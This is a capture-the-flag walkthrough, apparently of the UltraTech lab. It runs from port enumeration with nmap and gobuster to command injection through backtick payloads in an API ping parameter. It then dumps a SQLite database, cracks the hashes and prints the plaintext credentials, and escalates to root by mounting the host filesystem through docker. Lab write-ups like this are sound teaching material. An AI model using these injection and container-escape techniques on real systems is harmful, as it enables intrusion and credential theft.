[Task 1] Deploy the machine
[Task 2] It’s enumeration time!
- Which software is using the port 8081?
nmap -Pn <ip>
nmap -Pn -p1000- <ip>
In total, there’re 4 ports: 21,22,8081, and 31331.
Os and services scan
nmap -p 21,22,8081,31331 -A <ip>
Vulnerable scan
nmap -p 21,22,8081,31331 --script vuln <ip>
2. Which other non-standard port is used?
ANS: It’s in #1.
3. Which software using this port?
ANS: It’s in #1.
4. Which GNU/Linux distribution seems to be used?
ANS: It’s in #1.
5. The software using the port 8080 is a REST api, how many of its routes are used by the web application?
Access port 8081. Seems like It’s a web API.
View page source, not much useful.
Let’s scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>:8081/ -x php,txt,html,sh,cgiThere’s another path appeared.
Access it. Seems like I need some parameter.
I guess that “login” and “password” is a parameter. From the result, my guessing is correct.
Let’s access HTTP site on port 31331.
Seems like these’re possible usernames: r00t, P4c0, and Sq4l.
View page source, not much useful.
Click “What are we doing?”. Nothing much.
I always log my finding of the site with Burp Suite. There’s a possible of username: ultratech.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>:31331/ -x php,txt,html,sh,cgi
Access /images
Access partners.html
Try input some data and intercept with Burp Suite
Seems like this site is calling API on port 8081.
Access /css
Access /js
Access /api/api.js, there’s custom function: /ping and /auth.
Access robots.txt, there’s utech_sitemap.txt
Access it, nothing new.
Looking in Burp Suite’s sitemap again. There’s another api link besides /auth: /ping
[Task 3] Let the fun begin
- There is a database lying around, what is its filename?
Send /ping request to Burp Suite’s repeater.
Let’s try to do command injection
Using “;”
/ping?ip=...;lsFailed!!!
Using “;” and “${IFS}”
/ping?ip=...;${IFS}lsFailed!!!
Using “||” and encode as URL
Failed!!!
Using “ ` ”. It is precedence over other characters.
Success!!! There’s utech.db.sqlite
2. What is the first user’s password hash?
I try to get it from port 8081, but I failed.
Let’s read it via api.
Encode command “…||`cat utech.db.sqlite`” first
Paste the encoded string and send the request
Success!!! There’re 2 users: r00t and admin
3. What is the password associated with this hash?
Crack the hash with crackstation.
[Task 4] The root of all evil
Access API with credentials, there’s new user: “lp1”.
Access ftp with r00t:n100906
ls -laNothing much
Access ftp with admin:mrsheafy
Failed!!!
Try access ssh with r00t’s credential
Let’s do the enum first
Prepare to upload lse.sh
python -m SimpleHTTPServer 80
Download it.
wget http://<ip>/lse.sh
Change permission
chmod 777 lse.sh
./lse.sh -i -l 1There’re 4 users with shell
Another user that have sudo rights.
Not much useful
This machine has docker.
Verify sudo again
sudo -l
Read cron
cat /etc/crontabNot much useful.
Let’s try to get shell from docker
docker run -v /:/mnt --rm -it bash chroot /mnt sh
whoamiNow I’m root.
cd /rootcat private.txt
cd .sshcat id_rsa
cat id_rsa | cur -c1-9
